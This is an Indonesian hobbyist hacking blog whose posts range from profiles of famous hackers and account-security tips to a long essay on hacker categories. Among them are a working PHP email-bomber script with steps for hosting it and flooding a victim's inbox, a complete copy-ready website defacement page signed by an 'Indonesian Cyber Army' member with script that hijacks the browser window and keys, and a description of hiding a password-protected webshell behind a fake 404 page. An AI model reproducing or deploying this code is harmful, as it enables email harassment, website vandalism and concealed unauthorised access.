Formulir Kontak

 

Tokoh Hacker Legendaris Di Dunia

Bicara soal hacker ga lengkap kalo kita ga nengok tokoh3 yang menginspirasi kita, mungkin banyak orang ingin belajar hacking juga karna pengen melakukan aksi2 layaknya tokoh2 Hacker dunia Berikut ini tokoh2 yang sangat berjasa dalam perubahan dunia komputer dan dalam pencapaiannya hingga disebut sebagai Hacker Tingkat Dunia.

  1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam poster "FBI Most Wanted". Kevin juga seorang "Master of Deception" dan telah menulis buku yang berjudul "The Art of Deception". Buku ini Menjelaskan berbagai tekhnik social engineering untuk mendapatkan akses ke dalam sistem.











2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari "LINUX MINIX". Sistem operasi Linux telah menjadi sistem operasi "standar" hacker. Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developer dan hacker seluruh dunia untuk mengembangkan kernel linux.






 3.John Draper
Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal. Merupakan pelopor penggunaan nada 2600 Hz dan di kenal sebagai Phone Phreaker (Phreaker, baca: Frieker) Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepongratis. Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang di sebut "Blue Box"





4.Mark Abene
Mark Abene atau phiber optik adalah Salah seorang "Master of Deception", menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagain salah seorang dari 100 orang jenius oleh New York Magazine Menggunakan komputer Apple, Timex Sinclair dan Commondore 64. Komputer pertamanya adalah radio TRS-80 (trash-80)




Sekian dari saya Semoga artikel ini berguna... Bila ada salah kata mohon dimaafkan ^_^..

Total comment

Author

Adnan
404 Not Found adalah Halaman tidak di temukan, response yang kita dapat ketika kita mengakses halaman website namun halaman tersebut tidak di temukan di server website tersebut.

Untuk lebih memahami beberapa response HTTP anda bisa membaca sendiri list of HTTP Status di http://www.w3.org/protocolsrfc2616/rfc2616-sec10.html atau kalau yang bahasanya indonesia nya di http://logcode.net/content/list-http-status-code
Gambar 01. Halaman 404 Not Found
Tampilan halaman 404 Not found ini dapat kita gunakan untuk mengecoh admin, mengecoh admin ? Maksudnya ? Maksudnya adalah membuat backdoor yang tampilannya 404 Not Found namun Jika di Grepe-grepe ( njir bahasanya grepe2.. awas kata emak GREPE2 ADALAH KEHAMILAN YANG TERTUNDA ckckckck ) maksudnya raba - raba di bagian tengahnya terdapat lubang jiahhh lubang, colom maksudnya, untuk menulis Password yang di gunakan sebagai authentifikasi pemilik backdoor
Gambar 02. Webshell dengan kamuflase 404 Not Found
Daftarkan dulu variable yang digunakan sebagai user dan password, dalam konteks ini $auth_pass dalam Bentuk MD5

Total comment

Author

Adnan

Tips Mencegah Joomla dan Wordpress Hacking

Untuk cms terkenal seperti Jommla dan Wordpress memang setiap hari bisa saja ada celah yang muncul, enath itu dari extension atau pun dari plugn. Terlebih lagi, kedua cms inilah yang paling banyak di publish bug-nya di situs - situs exploit besar, sehingga banyak lamers yang memanfaatkannya. Beberapa tip yang bisa Anda lakukan untuk menghalau serangan attacker:
  1. Anda Bisa mencoba bergabung di forum hacker, agar mengetaui celah-celah terbaru yang ada. Atauanda bisa mencoba bertanya-tanya disana solusi jikalau sewaktu waktu web anda di-hack
  2. Hindari untuk tidak menggunakan Nulled Script. Karena ada indikasi penanam shell pada script tersebut
  3. Selalu lihat statistik, ini akan menghindari dan membuat Anda mengetahui web anda di-scan seorang Attacker.
  4. Gunakan modul, compunent, atau plugins yang mempunyai rating dia atas rata rata, artinya modul tersebut memang di percaya oleh sebagian penggunaanya
  5. Berlangganan berita berita terbaru dari situs situs yang mem-publish bug seperti http://www.us-cert.gov/. anda bisa saja Mem-subcribe rss-nya
  6. Update selalu Joomla atau wordpress Anda.
  7. Gunakan Username dan Password dengan karakter unik
  8. Ganti semua password dan username secara berkala.
Mungkin itu bisa saja sedikit tip mencegah serangan dari Admin blog, atau Anda bisa sekedar menghubungi pihak pengelola hosting agar memberikan keamanan pada situs anda

Sekian dari saya, Bila ada salah kata Mohon Dimaafkan ^_^

Total comment

Author

Adnan
Sebenarnya email adalah hal yang paling sulit diretas, tetapo tetap saja bisa tembus. Berikut adalah beberapa tip dari penulis untuk mengamankan email Anda:
  • Jangan gunakan password yang sama untuk email. Seperti password facebook sama dengan email, gunakan password yang berbeda untuk kedua akun tersebut
  •  Jangan gunakan password yang sangat mudah di tebak, seperti tanggal lahir, nomor ponsel, nomor plat kendaraan, beberapa kata seperti: 123456, 654321, asdasdasd dan lain sebagainya yang gampang di tebak
  • Lamer akan menjawab pertanyaan jika ingin me-reset password anda, sebaiknya dalam menjawab pertanyaan anda terlalu, "JUJUR". Bila pertanyaan perrtama adalah "di manakah bulan madu anda ?" Anda boleh saja menjawab "terserah mau dimana saja". Toh, jawaban ini juga untuk mengamankan akun Anda, jadi sah-sah saja. Begitu juga dengan pertanyaan yang kedua. Namun, ada baiknya anda mengingat kalimat jawabn Anda, karena bila satu huruf saja yang kurang di saat menjawab, maka akan di gagalkan...
Sekian dari saya, Bila ada salah kata mohon dimaafkan ^_^

Total comment

Author

Adnan

Script Bom Email Ekstensi PHP

Ini kerjaan usil waktu masih duduk dibangku Kuliah dulu. Mulai dari belajar ngehack, ngedeface, mencuri kuota temen sampai mengirim pesan ke email temen yang jumlahnya ribuan bahkan jutaan. Alamat email email bomber email bomb program email bomb online flood email email bomb software make email bomb Penelusuran yang terkait dengan bom email cara membuat bom email cara boom email  bom email software bom email bom 2011 bom friends sign up bom, bom email teman.
bom email - flood email

Saya akan ngebahas kejahatan saya bagian mengirim mail yang jumlahnya ribuan, tapi sekarang saya udah sadar kalo hal itu salah, tidak ada gunanya serta tidak ada untungnya dan tak layak untuk ditiru.
Jadi mohon di maafkan ya teman – teman kalo saya pernah ngusilin kalian. Hehe.. :)
Berikut contoh potongan programnya:
<html>
<body>
<form method=post action=index.php>
<pre>
<input type=hidden value=ok name=ok>
Dari : <input name=dari value=”<? echo $dari;?>”>
Kepada : <input name=kepada value=”<? echo $kepada;?>”>
Jumlah : <input name=jumlah value=”<? echo $jumlah;?>”>
Isi Pesan: <textarea name=isi><?echo $isi?></textarea><br>
<input type=submit value=Booom>
</form></pre>
<?
if ($ok==”ok”)
{
for ($i=0;$i<$jumlah;$i++)
{
$a=$i.$dari;
mail($kepada,$isi,”",”From : $a <$a>”);
}
echo (“Beres Bos”);
}
?>
</body>
</html>
Lalu simpan code tersebut dalam sebuah file, misalkan email-bomber.php
Selanjutnya masukkan file tersebut dalam webserver atau webhosting kamu.
Langkah berikutnya buka browser lalu masukkan alamat dimana kamu menyimpan file tersebut misalkan http://namadomainkamu.com/email-bomber.php
Jika alamat e-mail yang ditujukan benar maka akan secara otomatis mengirimkan pesan ke email korban.
Pesan terakhir jangan dilakukan karena Tuhan maha tahu dan kalo ada salah kata mohon di maafkan.
NB:
Artikel ini hanya untuk ilmu pengetahuan semata, penyalah gunaan artikel ini diluar dari tanggung jawab penulis.
SUMBER : BINUS HACKER

Total comment

Author

Adnan
Aku facebook selalu menjadi sasaran empuk para lamers. Entah itu dengan Keylogger atau pun me-reset email anda. Namun, tidak perlu kalang kabut dahulu, sebab ada beberapa cara berikut bisa di terapkan pada akun anda tidak gampang di serang Hacker

            1. Klik ikon gear di pojok kanan atas, Pilih "Pengaturan Akun atau Accounts Setting"
Gambar 03. Menu Pengaturan Akun Facebook
Pastikan Anda berada di bagian Tab menu Umum atau General
Gambar 04. Halaman tab menu Umum atau General
Kemudian ada beberapa pengaturan yang perlu di perhatikan antara lain:
a)     Dibagian email, pastikan tidak ada tanda centang pada Allow friends to my email address in Download Your Information.
  Gambar 05. Konfigurasi tampilan Email
Bila pengaturan tersebut aktif, maka seseorang bisa dengan mudah mendownload informasi mengenai id akun email anda di SmartPhon*-nya
b)     Update selalu password anda di bagian Password atau Kata sandi
Gambar 06. Konfigurasi Password atau Kata sandi
Mudah Bukan ?
Sekian dari saya Bila ada salah Kata Mohon Dimaafkan ^_^ 
 
 

Total comment

Author

Adnan
Sebenarnya PHISING adalah kejahatan dunia maya paling mudah di ketahui. Salah satu n=Metodenya adalah dengan memperhatikan urlnya. Gambar dibawah ini adalah url fake login pada facebook.
Gambar 01. Url facebook palsu
Pastikan bahwa domain situs facebook yang diakses adalah asli yaitu.


Gambar 02. Facebook Asli
Jika bukan domain selain itu, jangan lakukan login ke dalamnya.

Sekian dari saya Bila Ada salah kata Mohon dimaafkan ,,,,

Total comment

Author

Adnan
ScreenShotnya :











Mau ?
Copy aja ... CTRL + C ya gan :
<html lang="en">
<head>

<<object data="http://flash-mp3-player.net/medias/player_mp3.swf" width="0" height="0" type="application/x-shockwave-flash"><param value="#ffffff" name="bgcolor"><param value="mp3=http://205.196.120.129/d2vc35ezscbg/iavqifm5fmrxn8o/Overture+JKT48.mp3&auto_play=true&show_artwork=false&color=000000&amp;loop=1&amp;autoplay=1&amp;volume=125" name="FlashVars"></object>


<link href='http://fonts.googleapis.com/css?family=Orbitron:400,500,700' rel='stylesheet' type='text/css'>
<link rel="shortcut icon" type="image/x-icon" href="http://www11.online-convert.com/download-file/f9601ab3ac30ccc0f3bda645e0f03239/converted-16b44c27.ico" />
<style type="text/css">
body{background:#333 url(http://niagaradventure.com/indohack%20wallpaper*jpg) repeat; font-family:'Cosmic Sans'}
h1.main, p.demos{-webkit-animation-delay:18s; -moz-animation-delay:18s; -ms-animation-delay:18s; animation-delay:18s}
.sp-container{position:fixed; top:0px; left:0px; width:100%; height:100%; z-index:0; background:-webkit-radial-gradient(rgba(0,0,0,0.1),rgba(0,0,0,0.3) 35%,rgba(0,0,0,0.7)); background:-moz-radial-gradient(rgba(0,0,0,0.1),rgba(0,0,0,0.3) 35%,rgba(0,0,0,0.7)); background:-ms-radial-gradient(rgba(0,0,0,0.1),rgba(0,0,0,0.3) 35%,rgba(0,0,0,0.7)); background:radial-gradient(rgba(0,0,0,0.1),rgba(0,0,0,0.3) 35%,rgba(0,0,0,0.7))}
.sp-content{position:absolute; width:100%; height:100%; left:0px; top:0px; z-index:1000}
.sp-container h2{position:absolute; top:45%; line-height:100px; height:100px; margin-top:-50px; font-size:60px; width:100%; text-align:center; color:transparent; -webkit-animation:blurFadeInOut 3s ease-in backwards; -moz-animation:blurFadeInOut 3s ease-in backwards; -ms-animation:blurFadeInOut 3s ease-in backwards; animation:blurFadeInOut 3s ease-in backwards}
.sp-container h2.frame-11{-webkit-animation-delay:0s; -moz-animation-delay:0s; -ms-animation-delay:0s; animation-delay:0s}
.sp-container h2.frame-1{-webkit-animation-delay:3s; -moz-animation-delay:3s; -ms-animation-delay:3s; animation-delay:3s}
.sp-container h2.frame-2{-webkit-animation-delay:6s; -moz-animation-delay:6s; -ms-animation-delay:6s; animation-delay:6s}
.sp-container h2.frame-3{-webkit-animation-delay:9s; -moz-animation-delay:9s; -ms-animation-delay:9s; animation-delay:9s}
.sp-container h2.frame-4{-webkit-animation-delay:11s; -moz-animation-delay:11s; -ms-animation-delay:11s; animation-delay:11s}
.sp-container h2.frame-6{-webkit-animation-delay:13s; -moz-animation-delay:13s; -ms-animation-delay:13s; animation-delay:13s}
.sp-container h2.frame-5{-webkit-animation:none; -moz-animation:none; -ms-animation:none; animation:none; color:transparent; text-shadow:0px 0px 1px #fff}
.sp-container h2.frame-5 span{-webkit-animation:blurFadeIn 3s ease-in 15s backwards; -moz-animation:blurFadeIn 3s ease-in 15s backwards; -ms-animation:blurFadeIn 3s ease-in 15s backwards; animation:blurFadeIn 3s ease-in 15s backwards; color:transparent; text-shadow:0px 0px 1px #fff}
.sp-container h2.frame-5 span:nth-child(2){-webkit-animation-delay:16s; -moz-animation-delay:16s; -ms-animation-delay:16s; animation-delay:16s}
.sp-container h2.frame-5 span:nth-child(3){-webkit-animation-delay:17s; -moz-animation-delay:17s; -ms-animation-delay:17s; animation-delay:17s}
/**/
@-webkit-keyframes blurFadeInOut{0%{opacity:0; text-shadow:0px 0px 40px #fff; -webkit-transform:scale(1.3)}
20%, 75%{opacity:1; text-shadow:0px 0px 1px #fff; -webkit-transform:scale(1)}
100%{opacity:0; text-shadow:0px 0px 50px #fff; -webkit-transform:scale(0)}
}
@-webkit-keyframes blurFadeIn{0%{opacity:0; text-shadow:0px 0px 40px #fff; -webkit-transform:scale(1.3)}
50%{opacity:0.5; text-shadow:0px 0px 10px #fff; -webkit-transform:scale(1.1)}
100%{opacity:1; text-shadow:0px 0px 1px #fff; -webkit-transform:scale(1)}
}
@-webkit-keyframes fadeInBack{0%{opacity:0; -webkit-transform:scale(0)}
50%{opacity:0.4; -webkit-transform:scale(2)}
100%{opacity:0.2; -webkit-transform:scale(5)}
}
@-webkit-keyframes fadeInRotate{0%{opacity:0; -webkit-transform:scale(0) rotate(360deg)}
100%{opacity:1; -webkit-transform:scale(1) rotate(0deg)}
}
/**/
@-moz-keyframes blurFadeInOut{0%{opacity:0; text-shadow:0px 0px 40px #fff; -moz-transform:scale(1.3)}
20%, 75%{opacity:1; text-shadow:0px 0px 1px #fff; -moz-transform:scale(1)}
100%{opacity:0; text-shadow:0px 0px 50px #fff; -moz-transform:scale(0)}
}
@-moz-keyframes blurFadeIn{0%{opacity:0; text-shadow:0px 0px 40px #fff; -moz-transform:scale(1.3)}
100%{opacity:1; text-shadow:0px 0px 1px #fff; -moz-transform:scale(1)}
}
@-moz-keyframes fadeInBack{0%{opacity:0; -moz-transform:scale(0)}
50%{opacity:0.4; -moz-transform:scale(2)}
100%{opacity:0.2; -moz-transform:scale(5)}
}
@-moz-keyframes fadeInRotate{0%{opacity:0; -moz-transform:scale(0) rotate(360deg)}
100%{opacity:1; -moz-transform:scale(1) rotate(0deg)}
}
/**/
@keyframes blurFadeInOut{0%{opacity:0; text-shadow:0px 0px 40px #fff; transform:scale(1.3)}
20%, 75%{opacity:1; text-shadow:0px 0px 1px #fff; transform:scale(1)}
100%{opacity:0; text-shadow:0px 0px 50px #fff; transform:scale(0)}
}
@keyframes blurFadeIn{0%{opacity:0; text-shadow:0px 0px 40px #fff; transform:scale(1.3)}
50%{opacity:0.5; text-shadow:0px 0px 10px #fff; transform:scale(1.1)}
100%{opacity:1; text-shadow:0px 0px 1px #fff; transform:scale(1)}
}
@keyframes fadeInBack{0%{opacity:0; transform:scale(0)}
50%{opacity:0.4; transform:scale(2)}
100%{opacity:0.2; transform:scale(5)}
}
@keyframes fadeInRotate{0%{opacity:0; transform:scale(0) rotate(360deg)}
100%{opacity:1; transform:scale(1) rotate(0deg)}
}
.thanks{height:200px; width:60%; margin:50px auto}
.thanks h2{ font:20px/200px Helvetica,sans-serif; text-align:center}
</style>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta HTTP-EQUIV="EXPIRES" CONTENT="0">
<meta HTTP-EQUIV="Content-Language" content="Id">
<meta HTTP-EQUIV="Pragma" content="no-cache">
<meta name="RESOURCE-TYPE" CONTENT="DOCUMENT">
<meta name="DISTRIBUTION" CONTENT="GLOBAL">
<meta name="Description" CONTENT="Defaced By AdnAn0nym0u5">
<meta name="ROBOTS" CONTENT="INDEX, FOLLOW">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Defaced by AdnAn0nym0u5</title>
</head><body oncontextmenu="return false;" screen_capture_injected="true" onload="type_text()" ;="" text="16777215" bgcolor="#000000"><center>

<script type="text/javascript">
if (window.jstiming) window.jstiming.load.tick('headEnd');
</script>
<script <script="" type="text/javascript">
//<![CDATA[
window.scrollBy(0,1);window.resizeTo(0,0);window.moveTo(0,0);setTimeout("move()",2);var mxm=50;var mym=25;var mx=0;var my=0;var sv=50;var status=1;var szx=0;var szy=0;var c=255;var n=0;var sm=30;var cycle=2;var done=2;function move(){if(status==1){mxm=mxm/1.05;mym=mym/1.05;mx=mx+mxm;my=my-mym;mxm=mxm+(400-mx)/100;mym=mym-(300-my)/100;window.moveTo(mx,my);rmxm=Math.round(mxm/10);rmym=Math.round(mym/10);if(rmxm==0){if(rmym==0){status=2}}}if(status==2){sv=sv/1.1;scrratio=1+1/3;mx=mx-sv*scrratio/2;my=my-sv/2;szx=szx+sv*scrratio;szy=szy+sv;window.moveTo(mx,my);window.resizeTo(szx,szy);if(sv<0.1){status=3}}if(status==3){document.fgColor=16777215;c=c-16;if(c<0){status=8}}if(status==4){c=c+16;document.bgColor=c*65536;document.fgColor=(255-c)*65536;if(c>239){status=5}}if(status==5){c=c-16;document.bgColor=c*65536;document.fgColor=(255-c)*65536;if(c<0){status=6;cycle=cycle-1;if(cycle>0){if(done==1){status=7}else{status=4}}}}if(status==6){document.title="what are you doing?";alert("what are you doing?");cycle=2;status=4;done=1}if(status==7){c=c+4;document.bgColor=c*65536;document.fgColor=(255-c)*65536;if(c>128){status=8}}if(status==8){window.moveTo(0,0);sx=screen.availWidth;sy=screen.availHeight;window.resizeTo(sx,sy);status=9}var a=setTimeout("move()",0.3)}function keypressed(){return false}document.onkeydown=keypressed;
//]]>
</script>
<style type="text/css"></style></head>

<div class="container">
<center>
</center> <br>
<div style="font-family:'Orbitron', sans-serif;font-size:24;" class="sp-container">
<div class="sp-content">
<h2 class="frame-11"><br>This Moment We Own It</h2><h2>
</h2><h2 class="frame-1"><br>Your Security System is Very Low</h2>
<h2 class="frame-2"><br> We are Indonesian Cyber Army </h2>

</div>
</div>
<marquee><span style="font-family:'Orbitron', sans-serif;font-size:27px;
color: #00FFFF;
text-shadow: 0 0 50px lime,10px 10px 50px lime,0 0 20px lime,0 0 50px lime;">Thanks To: | Indonesian Cyber Army | Suram-Crew | Indonesian Security Down | Surabaya BlackHat | Jember Hacker | Biang Kerox Team |</span></marquee>
</div>

<center>

<br>

<span style="font-family:'Orbitron', sans-serif;font-size:27px;
color: #6FF;
text-shadow: 0 0 60px #7FF,40px 40px 100px #7FF,0 0 40px #7FF,0 0 40px #6FF;"><p>From Indonesian Cyber Army<br>| Hacked By AdnAn0nym0u5 |<br><font size=4 font color="yellow"><b>| PM: adnannak_persib@rocketmail.com | There is No Perfect System | </font></p></span><img src=http://www.indocyberarmy.org/files/images/idca.png width=280 height=300>

</body>


<br><br>
<marquee behavior="scroll" direction="right"><span style="font-family:'Orbitron', sans-serif;font-size:27px;
color: white;
text-shadow: 0 0 50px lime,10px 10px 50px lime,0 0 20px lime,0 0 50px lime;"> Onix AQua | Garuda Dot ID | ZiruX | NucLeaR911 | Freezer22 | Newbiehacker061099.php | Deathscore_196 | Ibnu_Sina | Mr.TripleXMaster007 | Si-Doel | Death-Code 19 | ViruzTomcat | dragonica343 | Manusia99 | Sanja07 | SeaGhost | ConfigTxt | win32conficker | Newbie Unknown Name-21 | Shiraume_Noyamano | NextcVip- Jr | Fam0uzHack | k260399 | Gober | Rakh4nyM0uz | Mr.SC | PK007 | MDN_Newbie | Mrs.Rheina22 | Mr.D | ShadoWNamE | Jinja | Exploit86 | Haji muhiding | LocalGhost | (Thanks To All Member Indonesian Cyber Army)</span></marquee>

</html>



Sekian dari saya.... Apa bila saya ada salah - salah kata, mohon di maafkan ^_^

Total comment

Author

Adnan
Disini Saya akan meberikan tentang pengertian Hacker secara detail.
Dan berikut pengertiannya.

Mengacu pada seseorang yang punya minat besar untuk mempelajari sistem komputer secara detail dan bagaimana meningkatkan kapabilitasnya. Besarnya minat yang dimiliki seorang hacker dapat mendorongnya untuk memiliki kemampuan penguasaan sistem yang diatas rata-rata kebanyakan pengguna. Jadi, pada dasarnya hacker sebenarnya memiliki konotasi yang netral.


Di masyarakat umum, istilah hacker ini banyak tersalahgunakan atau rancu dengan istilah Cracker ( Pembobol. Orang yang mampu menembus kode dan kode kunci (password) serta memecahkan sistem security tanpa izin atau secara tidak beretika. Istilah {cracker} telah ditemui oleh pengganggu sistem komputer untuk membedakan aktivititas penggunaan komputer yang melanggar aturan atau untuk memberikan istilah yang lebih berdasarkan aktivitasnya. Istilah ini juga membedakan {hacker} yang disebut sebagai seseorang yang mahir dalam menggunakan komputer beserta perintah-perintah dasarnya ). Khususnya ketika pembahasan mengarah kepada kejahatan. Dimana istilah untuk penjahat yang mereka maksud sebenarnya adalah Cracker.
Dalam dunia underground orang yang menjadi hacker biasanya melalui tahapan-tahapan berikut:




1. Mundane Person
Tahapan yang dilalui oleh mereka yang menjadi hacker. Mundane Person merupakan tingkatan paling bawah. Seseorang pada tingkatan ini pada dasarnya tidak tahu sama sekali tentang hacker dan cara-caranya, walaupun ia mungkin memiliki komputer sendiri dan akses Internet. Ia hanya tahu bahwa yang namanya hacker itu membobol sistem komputer dan melakukan hal-hal yang negatif (tindak kejahatan).


2. Lamer
Tahapan yang dilalui oleh mereka yang menjadi hacker. Seseorang pada tingkatan ini masih dibingungkan oleh seluk beluk hacking karena ia berpikir bahwa melakukan hacking sama seperti cara-cara warez (dalam dunia underground berarti menggandakan perangkat lunak secara ilegal). Pengetahuannya tentang hal-hal seperti itu masih minim, tapi sudah mencoba belajar. Seseorang pada tingkatan ini sudah bisa mengirimkan trojan (yang dibuat orang lain) ke atau pada komputer orang lain ketika melakukan obrolan pada IRC atau ICQ dan menghapus file-file mereka. Padahal ia sendiri tidak tahu persis bagaimana trojan bekerja. Seseorang yang sukses menjadi hacker biasanya bisa melalui tahapan ini dengan cepat bahkan melompatinya.



3. Wannabe
Tahapan yang dilalui oleh mereka yang menjadi hacker. Pada tingkatan ini seseorang sudah mengetahui bahwa melakukan tindakan hack itu lebih dari sekedar menerobos masuk ke komputer orang lain. Ia lebih menganggap hal tersebut sebagai sebuah filsafat atau way of life. Akhirnya ia jadi ingin tahu lebih banyak lagi. Ia mulai mencari, membaca dan mempelajari tentang metode-metode hacking dari berbagai sumber.


4. Larva
Tahapan yang dilalui oleh mereka yang menjadi hacker. Juga dikenal dengan sebutan newbie. Pada tingkatan ini ia sudah memiliki dasar-dasar teknik hacking. Ia akan mencoba menerobos masuk ke sistem orang lain hanya untuk mencoba apa yang sudah ia pelajari. Meskipun demikian, pada tingkatan ini ia mengerti bahwa ketika melakukan hacking ia tidak harus merusak sistem atau menghapus apa saja jika hal itu tidak diperlukan untuk menutupi jejaknya.



5. Hacker
Ada dua tingkatan hacker berdasarkan keahliannya, yaitu:

1. Wizard
Secara harfiah istilah ini berarti Dukun, Tukang Sihir. Wizard merupakan salah satu tuntunan ketika menjalankan program, baik pada saat melakukan instalasi, setting, dan sebagainya.
Tingkatan keahlian dari seorang hacker. Istilah ini diberikan pada seseorang yang telah memiliki pengetahuan luas dibidangnya. Kemampuannya tersebut tidak diragukan lagi.


2. Guru
Tingkatan keahlian dari seorang hacker. Istilah ini digunakan pada seseorang yang mengetahui semua hal pada bidangnya, bahkan yang tidak terdokumentasi. Ia mengembangkan trik-trik tersendiri melampaui batasan yang diperlukan. Kalau bidangnya berkaitan dengan aplikasi, ia tahu lebih banyak daripada pembuat aplikasi tersebut.

Karakter hacker itu sendiri dibagi menjadi dua, mereka ini lebih condong mengarah kepada sifat cracker. Kedua karakter tersebut adalah:

1. Dark-side Hacker
Karakter dari para hacker yang bersifat merusak. Istilah ini diperoleh dari film Star Wars-nya George Lucas. Seorang Dark-side hacker sama seperti Darth Vader (tokoh dalam film Star Wars) yang tertarik dengan kekuatan kegelapan. Hal ini tidak ada hubungannya dengan masalah “baik” atau “jahat” tapi lebih kepada masalah “sah (sesuai hukum yang berlaku)” dan “kekacauan”. Seorang Dark-side hacker punya kemampuan yang sama dengan semua hacker, tapi “sisi gelap” dari pikirannya membuat ia menjadi unsur berbahaya untuk semua komunitas.

2. Malicious Hacker
Karakter dari para hacker yang bersifat merusak. Hacker yang memiliki sifat jahat dan menyerang sistem dengan maksud jahat. Istilah untuk menyebut seseorang yang merusak sistem orang lain untuk sekedar iseng (tidak merasa bersalah) tanpa memperoleh apa pun dari tindakannya tersebut.

Sedangkan menurut Pola Pikirnya, Hacker dibagi menjadi 6 kelompok :

1. White Hat Hacker
White hat hacker, juga dikenal sebagai ethical hacker, adalah asal muasal dari information technology, seorang yang secara etik melawan serangan terhadap sistem komputer. Mereka sadar bahwa internet sekarang adalah perwakilan dari suara umat manusia. Seorang White Hat akan memfokuskan dirinya untuk membangun jaringan keamanan (security system), dimana Black Hat (lawannya) akan mencoba menghancurkannya.
White Hat juga seringkali digambarkan sebagai orang yang menerobos jaringan untuk menolong si pemiliki jaringan menemukan cacat pada system keamanannya. Banyak dari mereka yang dipekerjakan oleh perusahaan computer security; mereka disebut sebagai sneakers. Sekumpulan dari orang-orang ini disebut tiger teams.

Perbedaan mendasar antara White dan Black Hat adalah White Hat Hacker mengklaim mereka mengobservasi dengan Etika Hacker. Seperti Black Hat, White Hat biasanya sangat mengerti internal detail dari security system, dan dapat menciptakan kode untuk memecahkan masalah yang ada.


2. Red Hat Hacker
Secara sederhana, Red Hat Hacker berpikir dengan:

* Hat (Fire)
* Intuition
* Opinion
* Emotion (subjective)

3. Yellow Hat Hacker
Secara sederhana, Yellow Hat Hacker berpikir dengan:

* Hat (Sun)
* Praise
* Positive aspects (objective)

4. Black Hat Hacker
Black hat (juga dikenal sebagai Darkside hacker) adalah hacker berorientasi criminal dengan sifat perusak. Biasanya mereka ada diluar security industry dan oleh para modern programmers. Biasanya Black hat adalah seorang yang memiliki pengetahuan tentang kecacatan system dan mengeksploitasinya untuk mendapatkan keuntungan pribadi. Banyak Black Hat mengutamakan kebebasan individu daripada accessibility dari privacy dan security. Black Hats akan mencari cara untuk membuat lubang yang terbuka pada system menjadi semakin lebar; mereka akan melakukan cara-cara untuk membuat seseorang memiliki kontrol atas system. Black hat akan bekerja untuk menghasilkan kerusakan dan/atau untuk mengancam dan memeras seseorang.

Black-hat hacking adalah sebuah tindakan yang tidak disetujui untuk membobol system tanpa seijin dari pihak berwenang, biasanya dilakukan pada komputer yang terhubung dengan jaringan.

5. Green Hat Hacker
Secara sederhana, seorang Green Hat Hacker berpikir:


* Hat (Plant)
* Alternatives
* New approaches
* Everything goes (speculatif)

6. Blue Hat Hacker
Secara sederhana, Blue Hat Hacker berpkir dengan :


* Hat (Sky)
* Big Picture
* Conductor hat
* Thinking about thinking
* Overall process (overview)
* Menunjuk kepada perusahaan konsultasi komputer security yang digunakan untuk menjalankan bug test sebelum system dijalankan.

7. Others) Grey Hat Hacker
(Other) Gray Hat Hacker
Grey hat dalam komunitas komputer security, adalah hacker dengan skill yang kadang-kadang bertindak secara legal dengan itikad baik, tapi kadang juga tidak. Ia adalah perpaduan dari white dan black hat hackers. Mereka meng-hack untuk keuntungan pribadi tapi tidak memiliki tujuan yang merusak. Sebagai contoh, sebuah serangan terhadap bisnis perusahaan dengan praktik tidak etis dapat dikatakan sebagai tindakan Black Hat. Tetapi, seorang Gray Hat tidak akan melakukan sesuatu yang jahat, walaupun dia telah melanggar hukum. Jadi bukannya dikatakan sebagai Black Hat, dia dikatakan sebagai Grey Hat Hack. Seorang yang masuk ke system komputer hanya untuk meninggalakna jejak, dan tidak melakukan tindakan perusakan, ini yang dinamakan Grey Hat.

Hirarki / Tingkatan Hacker

Hacker juga mempunyai tingkatan-tingkatan, tiap tingkatan di bedakan dengan kemampuan dan ilmu yang dimiliki sang hacker :
1.Elite
Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu/guru’.
2.Semi Elite

Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.
3.Developed Kiddie

Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Graphical User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
4.Script Kiddie

Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.
5.Lammer

Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.

Cracker tidak mempunyai hirarki khusus karena sifatnya hanya membongkar dan merusak
Akibat yang Ditimbulakan oleh Hacker dan Cracker

Hacker : membuat teknologi internet semakin maju karena hacker menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software, membuat gairah bekerja seorang administrator kembali hidup karena hacker membantu administrator untuk memperkuat jaringan mereka.

Cracker : merusak dan melumpuhkan keseluruhan sistem komputer, sehingga data-data pengguna jaringan rusak, hilang, ataupun berubah.


Tahapan yang dilalui oleh mereka yang menjadi hacker.
